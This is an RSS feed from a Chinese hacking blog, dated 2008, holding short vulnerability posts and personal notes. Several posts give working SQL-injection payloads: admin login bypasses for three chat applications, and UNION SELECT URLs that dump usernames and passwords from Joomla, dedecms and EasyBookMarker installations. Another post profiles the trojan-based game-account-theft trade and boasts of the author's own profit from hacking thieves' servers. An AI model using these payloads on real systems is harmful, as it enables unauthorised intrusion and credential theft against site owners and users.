<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[SpookZanG Blog]]></title> 
<link>http://www.spookzang.net/index.php</link> 
<description><![CDATA[SpookZanG Blog]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[SpookZanG Blog]]></copyright>
<item>
<link>http://www.spookzang.net/read.php/340.htm</link>
<title><![CDATA[Natterchat v1.12 存在后台登入漏洞]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[安全新闻]]></category>
<pubDate>Sat, 22 Nov 2008 02:00:08 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/340.htm</guid> 
<description>
<![CDATA[ 
	来到后台：<br/>http://www.[SpookZanG].Netl/chat/nattechat/home.asp<br/><br/>用户名输入admin，<br/><br/>密码输入 ' or '1'='1<br/><br/>即可进入.<br/>Tags - <a href="http://www.spookzang.net/go.php/tags/%25E5%2590%258E%25E5%258F%25B0/" rel="tag">后台</a> , <a href="http://www.spookzang.net/go.php/tags/%25E7%2599%25BB%25E5%25BD%2595/" rel="tag">登录</a>
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/339.htm</link>
<title><![CDATA[Joomla Component 存在SQL注入漏洞！]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[安全新闻]]></category>
<pubDate>Sat, 22 Nov 2008 01:58:11 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/339.htm</guid> 
<description>
<![CDATA[ 
	利用方法：<br/><br/>http://www.[spookzang].net/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*<br/><br/>Tags - <a href="http://www.spookzang.net/go.php/tags/sql/" rel="tag">sql</a> , <a href="http://www.spookzang.net/go.php/tags/%25E6%25B3%25A8%25E5%2585%25A5/" rel="tag">注入</a>
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/338.htm</link>
<title><![CDATA[D.R.T 改组为 S.C.T ！]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[安全新闻]]></category>
<pubDate>Tue, 18 Nov 2008 03:11:34 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/338.htm</guid> 
<description>
<![CDATA[ 
	S.C.T 是一个专门讨论脚本安全的小组。
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/337.htm</link>
<title><![CDATA[X7 Chat 2.0.5 登录漏洞]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[安全新闻]]></category>
<pubDate>Sat, 15 Nov 2008 15:05:33 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/337.htm</guid> 
<description>
<![CDATA[ 
	来到后台。<br/><br/>用户名和密码输入：' or ' 1=1--<br/><br/>即可。<br/>Tags - <a href="http://www.spookzang.net/go.php/tags/%25E7%2599%25BB%25E5%25BD%2595/" rel="tag">登录</a> , <a href="http://www.spookzang.net/go.php/tags/%25E6%25BC%258F%25E6%25B4%259E/" rel="tag">漏洞</a>
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/336.htm</link>
<title><![CDATA[dedecms gbk版0day]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[安全新闻]]></category>
<pubDate>Sat, 15 Nov 2008 15:00:49 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/336.htm</guid> 
<description>
<![CDATA[ 
	貌似又是通过特殊符号绕开GBK的转换……<br/><br/>漏洞文件：plus/infosearch.php<br/><br/>测试版本：5.1 gbk<br/><br/>描述：$q变量没有过滤直接进入查询，导致注入出现。代码如下：<br/><br/>PHP代码 <br/><br/>q = trim($q);<br/>if($areaid > 0) &#123;<br/>$wheresql = "areaid=$areaid and ";<br/>&#125;<br/> <br/>$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";<br/> <br/>$dlist = new DataList();<br/> <br/>$dlist->pageSize = 20;<br/>$dlist->SetParameter("q",$q);<br/>$dlist->SetParameter("action",'search');<br/>$dlist->SetParameter("areaid",$areaid);<br/>$dlist->SetSource($query);<br/>“‘”突破了，那就照常注入。<br/><br/>测试站：<br/>http://www.xxx.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,id,4,pwd,6%20from%20dede_admin/*<br/><br/>至于后台拿shell,找不到后台的一样可以轻松拿到shell.不会的留言。<br/><br/>还有几个文件存在注入问题，象feedback.php,后续发放分析。<br/><br/><br/><br/><br/>Tags - <a href="http://www.spookzang.net/go.php/tags/gbk/" rel="tag">gbk</a> , <a href="http://www.spookzang.net/go.php/tags/php/" rel="tag">php</a> , <a href="http://www.spookzang.net/go.php/tags/%25E7%2589%25B9%25E6%25AE%258A/" rel="tag">特殊</a> , <a href="http://www.spookzang.net/go.php/tags/%25E5%25AD%2597%25E7%25AC%25A6/" rel="tag">字符</a>
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/335.htm</link>
<title><![CDATA[回归魔力2.]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[安全新闻]]></category>
<pubDate>Sat, 15 Nov 2008 14:58:33 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/335.htm</guid> 
<description>
<![CDATA[ 
	玩玩看看把。不知怎样呢。<br/>Tags - <a href="http://www.spookzang.net/go.php/tags/%25E9%25AD%2594%25E5%258A%259B2/" rel="tag">魔力2</a> , <a href="http://www.spookzang.net/go.php/tags/%25E5%259B%259E%25E5%25BD%2592/" rel="tag">回归</a> , <a href="http://www.spookzang.net/go.php/tags/9you/" rel="tag">9you</a>
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/334.htm</link>
<title><![CDATA[Myiosoft EasyBookMarker 存在SQL注入漏洞！]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[安全新闻]]></category>
<pubDate>Sat, 08 Nov 2008 14:18:42 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/334.htm</guid> 
<description>
<![CDATA[ 
	利用方法：http://WWW.SPOOKZANG.NET/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--<br/><br/><br/><br/>Tags - <a href="http://www.spookzang.net/go.php/tags/sql/" rel="tag">sql</a> , <a href="http://www.spookzang.net/go.php/tags/%25E6%25B3%25A8%25E5%2585%25A5/" rel="tag">注入</a> , <a href="http://www.spookzang.net/go.php/tags/%25E6%25BC%258F%25E6%25B4%259E/" rel="tag">漏洞</a>
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/333.htm</link>
<title><![CDATA[网游盗号产业内幕]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[安全新闻]]></category>
<pubDate>Sat, 08 Nov 2008 14:15:20 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/333.htm</guid> 
<description>
<![CDATA[ 
	这个行业主要这么几个层次：<br/>1.流量商--这类人等于说是这行业的营业员 促销员..没有他你就等于没有“顾客”....<br/>他们从个个网站站长手里收来流量 其中也有黑来的网站.然后转到自己的服务器里 自己的服务器挂好网马.有漏洞的话 点击那些网站 就会自动运行一个程序 “下载者”.下载者的功能是 直接干掉你的杀软.有的有熊猫烧香的能力去感染..ARP..自动按规矩按时间去下载规定的木马.上次我做了个实验.中了一个 直接下载了34个木马病毒..个类网游的木马都有.. 这类人 我详细算了一下 他们收流量的价格是 1万IP=90元... 就算是100元.他们给那些买木马挂信的人来挂 就拿100万流量来跑...网马中率为百分之20（已经很低了）. 那么会有20万个人中镖..这20万人..算有百分之10的人玩网络游戏 那么大概会有2万个游戏ID.. 个个游戏的价位不一样的..平均了一下 按最低价 一个ID 算1元.那么他的收入是一天2万元..收100万流量的钱才1千快... 在除掉服务器的费用下家宣传收量的费用 除 除 除 算掉1万. 那么他一天赚1万！...我已经算的够低了...！ 往往是这个的好几倍！<br/>2.木马作者--这类人 市场上形成品牌的有 按顺序来 “快乐老家” “八一软件” “大小姐”“刺客”“大少爷”“天下无马”“巴拿马”“伯乐” “站神”“比翼马”“皇马”“温柔马”等..<br/>这些作者写了有20多款游戏的木马每款木马生成器卖3000元 小马1000元.（小马是一个地址一个木马.而生成器是可以生成出很多的小马.这些木马是网站ASP收信的 俗称 “箱子”）...现在都形成品牌了..因为流量商挂马要名牌作者的马 都有马的验证器...而那些验证器上 可以给垄断马（你垄断了以后作者不会在卖给别人）的人做广告 垄断一款马的价格是 一月2万...就拿伯乐来说 他不下15款游戏被垄断了.这一月就30万.还有他卖其他没垄断的马.<br/>.... 具我了解“天下无马”这个作者 做了一年..赚了最少不下300多万.然后洗手不干了.<br/>3.做游戏的--（什么游戏的都用 只要你能掌握一门游戏）买马 垄断马..大规模的找流量商去挂...挂完以后 现在大多数都是以工作室为主..自己挂来自己洗（扒号卖装备卖游戏币）完了以后卖RMB..<br/>有的做卖信的..比如 1快从流量商那挂来的信2快卖出去..卖给那些洗信的人..这些人很多..因为都是利润..拿梦幻西游这个游戏来说吧...他们1.3元挂来的信3元卖给 洗信的人...这些信（盗来的帐号密码）只要是个很普通点的号 算个中等的 装备钱卖了 值500万梦幻游戏币绰绰有余 大号就先不说了..而500万游戏币 就是50元RMB...而且非常好卖...运气好了遇到一个大号 随便值2 3百不成问题....<br/>一般的 我认识的一个做大话3的..以前一天最高进信 2万多..他只卖信赚差价 都是供不应求的..<br/>4.受害者--游戏玩家 ...现在的网络游戏 纯粹是金钱游戏了.不投入RMB你是玩不好的...而这些人号是怎么丢的呢？？？ 无意期间 baidu个问题....进了一些不是知名的大网站 或者黄网............<br/>这就是这个行业...创造了很多百万..也拯救了不少沉迷在网络游戏里的学生 青少年...<br/>而我呢？ 哈哈 在这行业里也两年了..我不是以上环节的.我算的上是黑吃黑吧... <br/>中马后然后上游戏 抓箱子的地址 然后根据某种漏洞去黑他们的箱子（他们的箱子是种WEB空间收信的ASP）..抓到地址后 黑他的箱子管理密码然后把这些箱子 便宜的去出售给会洗这些游戏的人.叫他们抢先去洗..下家也很赚 而我 对于我现在的经济能力也算很赚...最高记录一个月赚了1万6...但是由于上学时间有限因素..没有把他当回事..没有把他当很能赚钱创业的去对待.. 现在这个时常已经形成了品牌了做的那些人 越做越富...而现在黑箱子的那个漏洞 也不管用了..<br/>哎 真后悔以前小..没当回事没去做款游戏..做了的话 我现在绝对一年收入不下百万..<br/><br/><br/>Tags - <a href="http://www.spookzang.net/go.php/tags/%25E5%2586%2585%25E5%25B9%2595/" rel="tag">内幕</a>
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/332.htm</link>
<title><![CDATA[V3 Chat - Profiles 存在登录漏洞！]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[脚本相关]]></category>
<pubDate>Sat, 08 Nov 2008 14:13:59 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/332.htm</guid> 
<description>
<![CDATA[ 
	默认后台：http://www.[SpookZanG].net/admin/<br/><br/><br/>在用户名和密码处输入：<br/><br/>&nbsp;&nbsp;' or ' 1=1<br/><br/>即可登入<br/>Tags - <a href="http://www.spookzang.net/go.php/tags/sql/" rel="tag">sql</a> , <a href="http://www.spookzang.net/go.php/tags/%25E6%25B3%25A8%25E5%2585%25A5/" rel="tag">注入</a> , <a href="http://www.spookzang.net/go.php/tags/%25E7%2599%25BB%25E5%2585%25A5/" rel="tag">登入</a> , <a href="http://www.spookzang.net/go.php/tags/%25E6%25BC%258F%25E6%25B4%259E/" rel="tag">漏洞</a>
]]>
</description>
</item><item>
<link>http://www.spookzang.net/read.php/331.htm</link>
<title><![CDATA[正式加入D.R.T了！]]></title> 
<author>spookzang &lt;spookzang@gmail.com&gt;</author>
<category><![CDATA[随便说说]]></category>
<pubDate>Wed, 05 Nov 2008 08:21:55 +0000</pubDate> 
<guid>http://www.spookzang.net/read.php/331.htm</guid> 
<description>
<![CDATA[ 
	庆祝一下，晚上吃俩鸡腿。哈哈！
]]>
</description>
</item>
</channel>
</rss>